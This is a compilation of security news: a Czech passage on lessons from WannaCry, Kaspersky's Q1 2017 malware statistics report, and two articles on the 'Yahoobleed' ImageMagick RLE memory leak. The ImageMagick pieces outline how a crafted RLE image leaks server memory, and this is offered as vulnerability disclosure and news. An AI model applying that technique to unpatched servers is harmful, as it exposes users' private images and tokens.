Microsoft v březnu zveřejnil patch záplatující chybu, kterou WannaCry zneužil. S největší pravděpodobností se tak stalo poté, co byl NSA upozorněn, že se hackeři zmocnili jejích nástrojů a mohou je zneužít.

Další patch – a to i pro už nepodporované Win XP – Microsoft zveřejnil poté, co hackeři zaútočili. Podle odborníků by podobná opatření měla být standardem – v současnosti totiž už nepodporované operační systémy se záplatují pouze platící klientele.

3) IT oddělení by měla čelit následkům útoků, kterým mohla předcházet

Útok WannaCry poukázal na překvapující neschopnost IT oddělení napříč odvětvími. Útoku totiž mohlo být zabráněné, pokud by tato oddělení včasně a důsledně záplatovala patchy, které už byly k dispozici.

4) Uživatelé by si měli zvyknout na automatické aktualizace

Automatické aktualizace Windows 10 vzbudily mezi řadou uživatelů rozhořčení. Podle názorů některých odborníků by se ale přes ně měli být schopni přenést a přijmout je jako povinné očkování – celkové proočkování zamezí šíření nákazy. Volitelné by měly být jen aktualizace nesouvisející se zabezpečením.

5) Vlády by měly omezit pirátství

Obzvlášť tvrdě byla malwarem WannaCry zasažena Čína, jelikož většina tamních kopií Windows je pirátská, což znamená i to, že takové systémy nedostávají bezpečnostní aktualizace. A nejde jen o to, že vláda pirátství dostatečně nepotlačuje, nelegální software v Číně pohání i počítače vládních úředníků.

Podobný stav panuje i v Rusku. Podle předloňské studie sdružení BSA Software je 70 % veškerého softwaru v Číně a 64 % v Rusku nedostatečně licencováno. A čím větší tento podíl je, tím větší je riziko, že se malwarová nákaza dál rozšíří.

IT threat evolution Q1 2017. Statistics
23.5.2017 Kaspersky Analysis

According to KSN data, Kaspersky Lab solutions detected and repelled 479,528,279 malicious attacks from online resources located in 190 countries all over the world.

79,209,775 unique URLs were recognized as malicious by web antivirus components.

Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 288 thousand user computers.

Crypto ransomware attacks were blocked on 240,799 computers of unique users.

Kaspersky Lab’s file antivirus detected a total of 174,989,956 unique malicious and potentially unwanted objects.

Kaspersky Lab mobile security products detected:

1,333,605 malicious installation packages;
32,038 mobile banker Trojans (installation packages);
218,625 mobile ransomware Trojans (installation packages).
Mobile threats

Q1 events

The rise of Trojan-Ransom.AndroidOS.Egat

In the first quarter of 2017, we registered a dramatic growth in attacks involving mobile ransomware from the Trojan-Ransom.AndroidOS.Egat family: the number of users attacked by this type of malware increased more than 13 times from the previous quarter. Despite this Trojan being known to us since June 2016, such an explosive increase in the number of attacks has only occurred now.

This malware has standard mobile ransomware functionality: it blocks the device, overlays all open windows with its own window, then demands money to unblock the device. In most cases, the ransom amount fluctuates between $100 and $200. Most of the attacked users were in Europe, mainly Germany, the UK and Italy.

Revamped ZTorg

We managed to detect around 30 new Trojans from the Ztorg family in the official Google Play Store. To recap, this is the family that gave us infected fake guides for Pokémon GO. It was discovered in Google Play in the summer of 2016 and was installed more than 500,000 times. After installation, Ztorg checks to make sure it isn’t running on a virtual machine. If the check is passed smoothly, the main module is loaded from a remote server. By exploiting a vulnerability in the system, the Trojan tries to gain superuser privileges. If successful, it installs its modules into the system folders and also modifies the device settings so that it remains there – even after a reset to factory settings.

Trojan.AndroidOS.Ztorg.bp in the official Google Play Store

The Trojan uses several different modules that secretly download and install various programs on the device, display ads and even buy apps. It should be noted that the functionality of this malware has changed a bit: the number of checks to verify whether the device is real has decreased; the code for downloading, decrypting and loading the main module has been placed in a downloaded library.

Asacub awakens

In the first quarter of 2017, we noted that the Trojan-Banker.AndroidOS.Asacub mobile banker was actively spreading. Over three months, the representatives of this family attacked more than 43,000 mobile devices, which was 2.5 times more than in the previous quarter. Over 97% of all attacked users were in Russia. Asacub was mainly distributed via SMS spam. After clicking a malicious link, users were directed to a page where they were prompted to view an MMS that concealed the Trojan, which was then downloaded to the device. Interestingly, if the same link was opened on a Windows device, Backdoor.Win32.Htbot.bs was downloaded.

The site from which Trojan-Banker.AndroidOS.Asacub was downloaded

It’s worth noting that Trojan-Banker.AndroidOS.Asacub is constantly expanding its spyware functionality. In addition to the standard mobile banker features, such as stealing and sending text messages, or overlaying various applications with phishing windows, this Trojan hunts for the user’s call history, contacts and GPS location.

Mobile threat statistics

In the first quarter of 2017, Kaspersky Lab detected 1,333,605 malicious installation packages, which is almost as many as in Q4 2016.

Number of detected malicious installation packages (Q2 2016 – Q1 2017)

Distribution of mobile malware by type

Distribution of new mobile malware by type (Q4 2016 and Q1 2017)

In Q1 2017, the most affected was Trojan-Ransom – its share increased from 4.64% to 16.42%, that is 3.5 times. The most rapid growth in the number of installation packages was demonstrated by the Trojan-Ransom.AndroidOS.Congur family, which will be described below.

Second came Trojan-Spyware: in terms of the growth rate, its proportion reached 10.27% (+1.83%). This was caused by the increase in the number malicious programs belonging to the Trojan-Spy.AndroidOS.SmForw and Trojan-Spy.AndroidOS.SmsThief families designed to steal SMS.

In the first quarter, the biggest decline was demonstrated by Adware (7.32%) and Trojan-Dropper (6.99%) – their shares decreased by 4.99% and 4.48% respectively. In addition, the contribution of unwanted RiskTool programs dropped by 2.55%.

TOP 20 mobile malware programs

Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

In Q1 of 2017, 14 Trojans that use advertising as their main means of monetization (highlighted in blue in the table) made it into the TOP 20.Their goal is to deliver as many adverts as possible to the user, employing various methods, including the installation of new adware. These Trojans may use superuser privileges to conceal themselves in the system application folder, from which it will be very difficult to delete them.

Name % of attacked users *
1 DangerousObject.Multi.Generic 70.09
2 Trojan.AndroidOS.Hiddad.an 9.35
3 Trojan.AndroidOS.Boogr.gsh 4.51
4 Backdoor.AndroidOS.Ztorg.c 4.18
5 Trojan.AndroidOS.Sivu.c 4.00
6 Backdoor.AndroidOS.Ztorg.a 3.98
7 Trojan.AndroidOS.Hiddad.v 3.89
8 Trojan-Dropper.AndroidOS.Hqwar.i 3.83
9 Trojan.AndroidOS.Hiddad.pac 2.98
10 Trojan.AndroidOS.Triada.pac 2.90
11 Trojan.AndroidOS.Iop.c 2.60
12 Trojan-Banker.AndroidOS.Svpeng.q 2.49
13 Trojan.AndroidOS.Ztorg.ag 2.34
14 Trojan.AndroidOS.Ztorg.aa 2.03
15 Trojan.AndroidOS.Agent.eb 1.81
16 Trojan.AndroidOS.Agent.bw 1.79
17 Trojan.AndroidOS.Loki.d 1,76
18 Trojan.AndroidOS.Ztorg.ak 1.67
19 Trojan-Downloader.AndroidOS.Agent.bf 1.59
20 Trojan-Dropper.AndroidOS.Agent.cv 1.54
* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab’s mobile security product that were attacked.

First place was occupied by DangerousObject.Multi.Generic (70.09%), the verdict used for malicious programs detected using cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object. This is basically how the very latest malware is detected.

Trojan.AndroidOS.Hiddad.an (9.35%) was second. This piece of malware imitates different popular games or programs. Interestingly, once run, it downloads and installs the application it imitated. In this case, the Trojan requests administrator rights to combat its removal. The main purpose of Trojan.AndroidOS.Hiddad.an is aggressive display of adverts, its main “audience” is in Russia (86% of attacked users).

Third came Trojan.AndroidOS.Boogr.gsh (4.51%). Such verdict is issued for files recognized as malicious by our system based on machine learning. Despite the fact that this system can detect any types of malware, in Q1 2017, the most popular were advertising Trojans which used superuser privileges.

Eighth position in the ranking was occupied by Trojan-Dropper.AndroidOS.Hqwar.i (3.83%), the verdict used for the Trojans protected by a certain packer/obfuscator. In most cases, this name hides the representatives of the FakeToken and Svpeng mobile banking families.

The ranking also included Trojan-Banker.AndroidOS.Svpeng (2.49%), which was twelfth in the Top 20. This family has been active for three quarters in a row and remains the most popular banking Trojan in Q1 of 2017.

Trojan.AndroidOS.Agent.bw was sixteenth in the rating (1.79%). This Trojan, targeting primarily people in India (more than 92% of attacked users), just like Trojan.AndroidOS.Hiddad.an imitates popular programs and games, and once run, downloads and installs various applications from the fraudsters’ server.

The geography of mobile threats

The geography of attempted mobile malware infections in Q1 2017 (percentage of all users attacked)

TOP 10 countries attacked by mobile malware (ranked by percentage of users attacked)

Country* % of users attacked **
1 Iran 47.35
2 Bangladesh 36.25
3 Indonesia 32.97
4 China 32.47
5 Nepal 29.90
6 India 29.09
7 Algeria 28.64
8 Philippines 27.98
9 Nigeria 27.81
10 Ghana 25.85
* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

In Q1 2017, Iran was the country with the highest percentage of users attacked by mobile malware – 47.35%. Bangladesh came second: 36.25% of users there encountered a mobile threat at least once during the quarter. It was followed by Indonesia and China; the share of both countries was slightly over 32%.

Russia (11.6%) came 40th in this rating, France (8.1%) 57th, the US (6.9%) 69th line, Italy (7.1%) 66th, Germany (6.2%) 72nd, Britain (5.8%) 75th.

The safest countries were Finland (2.7%), Georgia (2.5%) and Japan (1.5%).

In all the countries of the Top 20, the same mobile objects – adware – are detected, and first of all, the representatives of the AdWare.AndroidOS.Ewind family as well as advertising Trojans.

Mobile banking Trojans

Over the reporting period, we detected 32,038 installation packages for mobile banking Trojans, which is 1.1 times as many as in Q4 2016.

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions (Q2 2016 – Q1 2017)

Trojan-Banker.AndroidOS.Svpeng remained the most popular mobile banking Trojan for the third quarter in a row. This family of mobile banking Trojans uses phishing windows to steal credit card data and logins and passwords from online banking accounts. In addition, fraudsters steal money via SMS services, including mobile banking. Svpeng is followed by Trojans Trojan-Banker.AndroidOS.Faketoken.z and Trojan-Banker.AndroidOS.Asacub.san. It is worth noting that most of attacked users were in Russia.

Geography of mobile banking threats in Q1 2017 (percentage of all users attacked)

TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)

Country* % of users attacked**
1 Russia 1.64
2 Australia 1.14
3 Turkey 0.81
4 Uzbekistan 0.61
5 Tajikistan 0.48
6 Moldova 0.43
7 Ukraine 0.41
8 Kazakhstan 0.37
9 Kyrgyzstan 0.32
10 Singapore 0.26
* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

Although the Svpeng family topped the rating of the most popular mobile banking Trojans in the first quarter of 2017, its activity declined compared to the third quarter of 2016: the share of users attacked by these malicious programs in Russia dropped almost twofold – from 3.12% to 1.64%. At the same time, Russia remained the TOP 20leader.

In second place was Australia (1.14%), where the Trojan-Banker.AndroidOS.Acecard and Trojan-Banker.AndroidOS.Marcher families were the most popular threats. Turkey (0.81%) rounded off the Top 3.

Mobile Ransomware

In Q1 2017, we detected 218, 625 mobile Trojan-Ransomware installation packages which is 3.5 times more than in the previous quarter.

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab (Q2 2016 – Q1 2017)

In the first half of 2016, we saw the increase in the number of mobile ransomware installation packages caused by the active spread of the Trojan-Ransom.AndroidOS.Fusob family. In the second half of the same year, the activity of this family fell, which affected the number of detected installation packages. The growth resumed in the fourth quarter of 2016 and sharply accelerated in Q1 2017. The reason was the Trojan-Ransom.AndroidOS.Congur family – more than 86% of detected mobile ransomware installation packages belonged to this family. Usually, the representatives of Congur have very simple functionality – they change the system password (PIN), or install it if no password was installed earlier, thus making it impossible to use the device, and then ask that user to contact the fraudsters via the QQ messenger to unblock it. It is worth noting that there are modifications of this Trojan that can take advantage of existing superuser privileges to install their module into the system folder.

Despite this, Trojan-Ransom.AndroidOS.Fusob.h remained the most popular mobile Trojan-Ransomware in the first quarter, accounting for nearly 45% of users attacked by mobile ransomware. Once run, the Trojan requests administrator privileges, collects information about the device, including GPS coordinates and call history, and downloads the data to a malicious server. After that, it may receive a command to block the device.

Geography of mobile Trojan-Ransomware in Q1 2017 (percentage of all users attacked)

TOP 10 counties attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked)

Country* % of users attacked**
1 USA 1.23
2 Uzbekistan 0.65
3 Canada 0.56
4 Kazakhstan 0.54
5 Italy 0.44
6 Germany 0.37
7 Korea 0.35
8 Denmark 0.30
9 United Kingdom 0.29
10 Spain 0.28
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab’s mobile security product in the country.

The US topped the ranking of ten countries attacked by mobile Trojan-Ransomware; the most popular family there was Trojan-Ransom.AndroidOS.Svpeng. These Trojans appeared in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng mobile banking family. They demand a ransom of $100-500 from victims to unblock their devices.

In Uzbekistan (0.65%), which came second, most of mobile ransomware attacks involved Trojan-Ransom.AndroidOS.Loluz.a. This is a simple Trojan that blocks operation of a device with its own window and asks the user to contact the fraudsters by phone to unblock it.

Fourth place was occupied by Kazakhstan (0.54%). The main threat to users originated from representatives of the Small mobile Trojan-Ransom family. This is a fairly simple ransomware program that blocks operation of a device by overlaying all the windows on the device with its own window and demanding $10 to unblock it.

In all other countries of the TOP 10, the most popular Trojan-Ransom family was Fusob.

Vulnerable apps exploited by cybercriminals

The first quarter of 2017 was marked by the return of the degenerated exploit kit Neutrino, which had departed the cybercriminal market in the third quarter. Following Magnitude, Neutrino is changing the distribution format and abandoning wide-scale campaigns to become a “private” exploit kit. Several new players – Nebula, Terror, and other –tried to fill the vacant niche but failed: after a brief burst of activity their distribution quickly came to naught. At the moment, RIG and its modifications remain the most popular and advanced public exploit kit.

The Q1 statistics show an almost 10% decline in the number of attacked users. This is primarily caused by weak exploit kit environment, as well as the decrease in the effectiveness of exploits in general. Adobe Flash remained the only platform that demonstrated growth: although no new vulnerabilities for it had been discovered, the number of attacked users grew by 20%. The biggest decrease fell on exploits for different browsers – only 44% of attacks targeted them (against 54% in the previous quarter).

CVE-2016-0189, CVE-2014-6332 and CVE-2013-2551 remain the most popular vulnerabilities in the first quarter. Of note were also vulnerabilities in the Microsoft Edge Chakra engine, published in open access in early 2017. In addition to the detailed description of vulnerabilities, the research included a ready-to-use Proof of Concept, which shortly after the publication was integrated in the Sundown exploit kit from which it moved to Neutrino, Kaixin and others. However, exploitation of these vulnerabilities was not reliable enough, while patches for them were released as far back as in November along with the MS16-129 update, so they have not become widely spread and are now almost out of use.

Distribution of exploits used in attacks by the type of application attacked, Q1 2017

In Q1 2017, especially popular were campaigns involving mass mailings of infected documents – to distribute them, Microsoft Office exploits were used. Although the share of attacked office package users has not changed much, the same users were attacked several times – on average, one attacked user received 3 malicious documents over the quarter.

The general trend is towards the increase in the share of social engineering when delivering malware to the computer of a potential victim. Campaigns involving distribution of infected messages are always based on forcing a user to perform certain actions: unpack a file from the password-protected archive, issue a permission to execute macros from the document, etc. This method is currently beginning to be applied in exploits for browsers. Magnitude, for example, offers the Internet Explorer 11 and Windows 10 users to download a malicious file under the guise of antivirus update for Microsoft Defender. Some spam campaigns are based on imitating the Google Chrome update page. We believe that this trend will continue in the future – such campaigns are easier to maintain and implement, and their level of “penetration” is constantly growing.

Online threats (Web-based attacks)

Online threats in the banking sector

These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. Beginning from the first quarter of 2017 the statistics include malicious programs for ATMs and POS terminals but does not include mobile threats.

Kaspersky Lab solutions blocked attempts to launch one or several malicious programs capable of stealing money via online banking on 288,000 computers in Q1 2017.

Number of users attacked by financial malware, January – March 2017

Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM and POS-malware worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.

Geography of banking malware attacks in Q1 2017 (percentage of attacked users)

TOP 10 countries by percentage of attacked users

Country* % of attacked users **
1 Germany 1.70
2 China 1.37
3 Libya 1.12
4 Kazakhstan 1.02
5 Palestine 0.92
6 Togo 0.91
7 Tunisia 0.89
8 Armenia 0.89
9 Venezuela 0.88
10 Taiwan 0.87
These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

*We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000).

** Unique users whose computers have been targeted by banking Trojan attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In the first quarter of 2017, Germany (1.70%) had the highest proportion of users attacked by banking Trojans. It was followed by China (1.37%). Libya (1.12%) rounded off the Top 3.

As for the contribution of the other European countries in the Q1 rating, for example, Spain (0.24%) was on 89th position and the UK (0.15%) came 126th.

The TOP 10 banking malware families

The table below shows the TOP 10 malware families used in Q3 2016 to attack online banking users (as a percentage of users attacked):

Name* % of attacked users**
1 Trojan-Spy.Win32.Zbot 45.93
2 Trojan.Win32.Nymaim 29.70
3 Trojan.Win32.Neurevt 3.31
4 Trojan-Banker.Win32.Gozi 3.15
5 Trojan-Spy.Win32.SpyEyes 2.71
6 Backdoor.Win32.ZAccess 2.11
7 Backdoor.Win32.Shiz 1.67
8 Trojan.Multi.Capper 1.67
9 Trojan.Win32.Tinba 1.00
10 Trojan.Win32.Shifu 1.00
*The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.

** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware.

As in the last year, in Q1 2017, Trojan-Spy.Win32.Zbot (45.93%) topped the rating of the most popular malware families. Its source codes have been publicly available since a leak and are now widely exploited as an easy-to-use tool for stealing user payment data. Unsurprisingly, this malware consistently tops this rating – cybercriminals regularly enhance the family with new modifications compiled on the basis of the source code and containing minor differences from the original.

Second came Trojan.Win32.Nymaim (29.70%). The first modifications of malware belonging to this Trojan family were downloaders, which blocked the infected machine with the help of downloaded programs unique for each country. Later, new modifications of the Trojan.Win32.Nymaim family malware were discovered. They included a fragment of Gozi used by cybercriminals to steal user payment data in online banking systems. In Q1 2017, Gozi (3.15%) was on 4th position in the rating.

Trojan.Win32.Neurevt (3.31%) rounded off the Top 3. It is a multifunctional Trojan written in C ++. It uses rootkit technologies to conceal its presence in the system, injects its own code into all running processes, blocks the work of some anti-virus programs, and can monitor and block installation of other common Trojans.

Ransomware Trojans

A total of 11 new cryptor families and 55, 679 new modifications were detected in Q1 2017.

The number of newly created cryptor modifications, Q2 2016 – Q1 2017

Most of detected modifications belonged to the Cerber family (the Trojan-Ransom.Win32.Zerber verdict). This cryptor, first discovered a year ago, continues to evolve, and we regularly detect its new improved versions.

The number of users attacked by ransomware

In Q1 2017, 240, 799 unique KSN users were attacked by cryptors.

Number of unique users attacked by Trojan-Ransom cryptor malware (Q1 2017)

This figure is almost half as much as that of the fourth quarter of 2016, but one should not consider it a receding threat. It is most likely that this difference is related to the methodology while the actual number of incidents is higher: the statistics only reflect the results of signature-based and heuristic detection, whereas most of the Trojan ransomware is detected by Kaspersky Lab products using behavioral methods and issuing a generic verdict that does not allow distinguishing types of malware.

The geography of attacks

Geography of Trojan-Ransom attacks in Q1 2017 (percentage of attacked users)

Top 10 countries attacked by cryptors

Country* % of users attacked by cryptors **
1 Italy 1.87%
2 Brazil 1.07%
3 Japan 0.99%
4 Vietnam 0.74%
5 Netherlands 0.73%
6 Cambodia 0.70%
7 Uganda 0.66%
8 Philippines 0.65%
9 Venezuela 0.63%
10 Nigeria 0.60%
* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 50,000).
** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country.

Italy, which was not in the Top 10 in the third quarter of 2016, now took the lead the Q1 ranking (1.87%). Second came Brazil (1.07%), the newcomer to the Top 10. This correlates with our observations that indicate an increase in the number Trojan ransomware targeting victims in Brazil. One of the examples of such malicious software was Xpan, which we analyzed last year.

Japan (0.99%), which ranked first in the second and third quarters of 2016, moved two places down but still remains at the top of the rating.

Top 10 most widespread cryptor families

Name Verdict* % of attacked users**
1 Cerber Trojan-Ransom.Win32. Zerber 18.04%
2 Spora Trojan-Ransom.Win32.Spora 7.59%
3 Locky Trojan-Ransom.Win32.Locky 7.35%
4 Sage Trojan-Ransom.Win32.SageCrypt 3.44%
5 Cryrar/ACCDFISA Trojan-Ransom.Win32.Cryrar 3.20%
6 Shade Trojan-Ransom.Win32.Shade 2.82%
7 (generic verdict) Trojan-Ransom.Win32.Gen 2.37%
8 Crysis/Dharma Trojan-Ransom.Win32.Crusis 2.30%
9 CryptoWall Trojan-Ransom.Win32.Cryptodef 2.25%
10 (generic verdict) Trojan-Ransom.Win32.Snocry 2.16%
* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.

The Trojan Cerber (18.04%) was the most widespread in the number of attacked users in the first quarter of 2017. It is no wonder, considering a huge number of this cryptor’s modifications and its active distribution by fraudsters.

Spora (7.59%) was on the second place. This new Trojan was first discovered in January 2017 and at the “dawn of its career” only attacked Russian-speaking victims. However, a few weeks after its detection Spora spread around the world and by the end of the first quarter entered the top three most popular cryptors. The third position was occupied by Locky (7.35%) which appeared about a year and has recently reduced its activity a little.

Yet another new Trojan is Sage (3.44%). Like Spora, it emerged in the first quarter of 2017 and came fourth in the Q1 rating. The rest places went to our “old acquaintances”, which appeared in the reports for the previous quarters.

Of special note is the finding of the quarter the cryptor PetrWrap, which is used by cybercriminals for targeted attacks on organizations. Statistics show that this type of attacks is gaining popularity.

Top 10 countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2017, Kaspersky Lab solutions blocked 479, 528, 279 attacks launched from web resources located in 191 countries around the world. 79, 209, 775 unique URLs were recognized as malicious by web antivirus components.

Distribution of web attack sources by country, Q1 2017

The Netherlands (38%) took the lead in the number of web attack sources. The United States (30%), which used to top this rating for several quarters in a row, dropped to second place, although the share of this country remained almost unchanged from the 2016’s figures. Germany (9%) rounded off the Top3.

Russia (4%) and France (3%) were fourth and fifth respectively.

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked**
1 Algeria 37.67
2 Belarus 33.61
3 Tunisia 32.04
4 Ukraine 31.98
5 Kazakhstan 29.96
6 Azerbaijan 29.95
7 Albania 29.80
8 Bangladesh 29.51
9 Qatar 29,41
10 Armenia 29.02
11 Greece 28.21
12 Moldova 27.46
13 Venezuela 27.37
14 Kyrgyzstan 27.02
15 Vietnam 26.87
16 Russia 26.67
17 Morocco 25.65
18 Sri Lanka 25.42
19 Brazil 25.10
20 Serbia 24.18
These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** Unique users whose computers have been targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 20.05% of computers connected to the Internet globally were subjected to at least one Malware-class web attack during the quarter.

Geography of malicious web attacks in Q1 2017 (ranked by percentage of users attacked)

The countries with the safest online surfing environments included Luxembourg (14.4%), Germany (13.9%), Norway (13.83%), South Africa (12.5%), the United States (10.56%), Uganda (10.29%) and Japan 9.18%).

Local threats

Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q1 2017, Kaspersky Lab’s file antivirus detected 174, 989, 956 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

The rating of malicious programs only includes Malware-class attacks. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked**
1 Yemen 54.84
2 Afghanistan 54.27
3 Uzbekistan 53.80
4 Tajikistan 51.32
5 Ethiopia 50.87
6 Djibouti 50.03
7 Algeria 49.38
8 Vietnam 49.15
9 Turkmenistan 48.39
10 Rwanda 47.57
11 Mongolia 47.25
12 Somalia 46.96
13 Syria 46.96
14 Bangladesh 46.64
15 Iraq 46.59
16 Sudan 46.35
17 Nepal 46.19
18 Kazakhstan 46.00
19 Laos 45.39
20 Belarus 43.45
These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** The percentage of unique users in the country with computers that blocked Malware-class local threats as a percentage of all unique users of Kaspersky Lab products.

An average of 23.63% of computers globally faced at least one Malware-class local threat during the third quarter. Russia’s contribution to this rating accounted for 30.51%.

The safest countries in terms of local infection risks were: Poland (14.85%), Singapore (12.21%), Italy (13.30%), France (11.15%), Australia (10.51%), Great Britain (9.08%), Canada (8.66%), the Czech Republic (7.83%), the United States (7.57%), Denmark (6.35%), Japan (6.18%).

18-Byte ImageMagick Hack Could Have Leaked Images From Yahoo Mail Server
23.5.2017 thehackernews Hacking
After the discovery of a critical vulnerability that could have allowed hackers to view private Yahoo Mail images, Yahoo retired the image-processing library ImageMagick.
ImageMagick is an open-source image processing library that lets users resize, scale, crop, watermarking and tweak images. The tool is supported by PHP, Python, Ruby, Perl, C++, and many other programming languages.
This popular image-processing library made headline last year with the discovery of the then-zero-day vulnerability, dubbed ImageTragick, which allowed hackers to execute malicious code on a Web server by uploading a maliciously-crafted image.
Now, just last week, security researcher Chris Evans demonstrated an 18-byte exploit to the public that could be used to cause Yahoo servers to leak other users' private Yahoo! Mail image attachments.
'Yahoobleed' Bug Leaks Images From Server Memory

The exploit abuses a security vulnerability in the ImageMagick library, which Evans dubbed "Yahoobleed #1" (YB1) because the flaw caused the service to bleed contents stored in server memory.
The vulnerability actually exists in the obscure RLE (Utah Raster Toolkit Run Length Encoded) image format.
To exploit the vulnerability, all an attacker need to do is create a maliciously crafted RLE image, and send it to the victim's email address, and then create a loop of empty RLE protocol commands, prompting the leakage of information.
To show how it is possible to compromise a Yahoo email account, Evans, as a proof-of-concept (PoC) demonstration, created a malicious image containing 18-byte exploit code and emailed it as an email attachment to himself.
Once the attachment reached the Yahoo's email servers, ImageMagick processed the image to generate thumbnails and previews, but due to the execution of Evans' exploit code, the library generated a corrupt image preview for the image attachment.
Once this image attachment is clicked, it launched the image preview pane, causing the service to display portions of images that were still present in the server's memory, instead of the original image.
"The resulting JPEG image served to my browser is based on uninitialized, or previously freed, memory content," Evans said.
Unlike Heartbleed and Cloudbleed that were due to out-of-bounds server side memory content leaks, Evans said Yahoobleed makes use of uninitialized or previously freed, memory content.
"The previous bleed vulnerabilities have typically been out-of-bounds reads, but this one is the use of uninitialized memory," Evans said. "An uninitialized image decode buffer is used as the basis for an image rendered back to the client."
"This leaks server-side memory. This type of vulnerability is fairly stealthy compared to an out-of-bounds read because the server will never crash. However, the leaked secrets will be limited to those present in freed heap chunks."
Yahoo Retires 'Buggy' ImageMagick Library
After Evans had submitted his 18-byte exploit code to Yahoo, the company decided to retire the ImageMagick library altogether, rather than fixing the issue.
Evans also warned of another version of Yahoobleed, dubbed Yahoobleed2, which was the due to Yahoo's failure to install a critical patch released in January 2015. He said the flaws combined could allow attackers to obtain browser cookies, authentication tokens, and private images belonging to Yahoo Mail users.
Evans was awarded a bug bounty payment of $14,000 -- $778 per byte for his exploit code -- by the tech giant, who decided to double the bounty to $28,000 after knowing Evans intention to donated his reward to a charity.
After Yahoo has been aware of the issue, Evans reported the vulnerability to the ImageMagick team, who released ImageMagick version 7.0.5-1 two months ago with a fix for the issue.
So, Other widely used Web services using the ImageMagick library are likely still vulnerable to the bug and are advised to apply the patches as soon as possible.

Yahoo Ditching ImageMagick Highlights Issues in Bug Responsibility Ecosystem

23.5.2017 securityweek Security
ImageMagick, an open source command line graphics file editor, has been retired by one of its major consumers: Yahoo. The product has been beset by flaws and bugs for several years, but this appears to have been one too many for Yahoo. Following discovery of a bleed vulnerability, Yahoo fixed it by retiring the product.

The flaw itself, discovered by researcher Chris Evans, was fixed by ImageMagick two months ago. Last week, however, he blogged about his discovery of its persistence at Yahoo. For Evans, it is symptomatic of a wider issue: vendor (ImageMagick) and consumer (in this case Yahoo) responsibility for upstream fixes.

ImageMagick (using his own fix) fixed the problem. Could or should it have done more to ensure that its consumers also applied that fix? Yahoo is (or was) a consumer. Could it or should it have done more to apply upstream fixes?

A solution, suggests Evans, is, "Probably less trivial than it sounds; both Box and Yahoo! appear to have been running old versions of ImageMagick with known vulnerabilities."

The vulnerability, exploited by Evans on Yahoo, provided "a way to slurp other users' private Yahoo! Mail image attachments from Yahoo servers." It was present in the RLE (Utah Raster Toolkit Run Length Encoded) image format. An attacker, writes Evans, "could simply create an RLE image that has header flags that do not request canvas initialization, followed by an empty list of RLE protocol commands. This will result in an uninitialized canvas being used as the result of the image decode."

In his own POC he attached an 18-byte exploit file as a Yahoo! Mail attachment, sent it to himself and clicked on the image in the received mail to launch the image preview pane. "The resulting JPEG image served to my browser," he writes, "is based on uninitialized, or previously freed, memory content."

